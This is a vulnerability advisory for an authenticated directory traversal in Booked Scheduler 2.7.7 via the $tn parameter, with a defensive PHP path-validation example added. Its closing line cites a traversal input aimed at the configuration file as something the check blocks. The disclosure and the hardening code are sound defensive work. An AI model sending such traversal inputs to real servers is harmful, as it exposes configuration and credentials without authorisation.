Vendor: Booked Scheduler
By: Besim ALTINOK
CVSS: 8.8 (HIGH)
Vulnerability Type: Authenticated Directory Traversal
CWE: 22
Product Name: Booked Scheduler
Affected Version From: 2.7.7
Affected Version To: 2.7.7
Patch Exists: YES
Related CWE: N/A
CPE: a:bookedscheduler:booked_scheduler
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Xampp
Year: 2020
Booked Scheduler 2.7.7 – Authenticated Directory Traversal
Booked Scheduler 2.7.7 contains an authenticated directory traversal vulnerability (CWE-22) that allows an authenticated user to read files outside of the web root directory. The vulnerable parameter is $tn, which is handled in the manage_email_templates.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the server.
Mitigation:
A patch exists; Booked Scheduler should be updated to the latest version to mitigate this vulnerability.
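The following is an added illustration of the kind of check that prevents a template-name parameter like $tn from escaping its directory; it is not Booked Scheduler's own code. The request key `tn`, the template directory path and the `.tpl` file-name pattern are assumptions for this example.

```php
<?php
// Added example, not code from the Booked Scheduler project.
// Resolves a user-supplied template name to a file strictly inside
// $templateDir, or returns null if the name is malformed or would
// resolve outside that directory.
function resolveTemplatePath(string $templateDir, string $tn): ?string
{
    // 1. Syntactic allowlist: a template name is a bare file name with
    //    no path separators, no parent-directory references and no NUL
    //    bytes. The ".tpl" suffix is an assumption for this example.
    if (!preg_match('/^[A-Za-z0-9_-]+\.tpl$/', $tn)) {
        return null;
    }

    $base = realpath($templateDir);
    if ($base === false) {
        return null; // base directory is missing or misconfigured
    }

    // 2. Canonicalise and verify containment, so that symlinks inside the
    //    template directory cannot be used to reach files outside it.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $tn);
    if ($candidate === false) {
        return null; // no such template file
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved path left the template directory
    }
    return $candidate;
}

// Handler usage: refuse the request rather than reading an arbitrary file.
// "/var/www/booked/lang/en_us" is an assumed template directory.
$tn = (string) ($_GET['tn'] ?? '');
$path = resolveTemplatePath('/var/www/booked/lang/en_us', $tn);
if ($path === null) {
    http_response_code(400);
    exit('Invalid template name');
}
$contents = file_get_contents($path);
```

Inputs such as `../../config/config.php` fail the allowlist at step 1, and anything that passes it but resolves outside the template directory (for example through a symlink) is rejected at step 2.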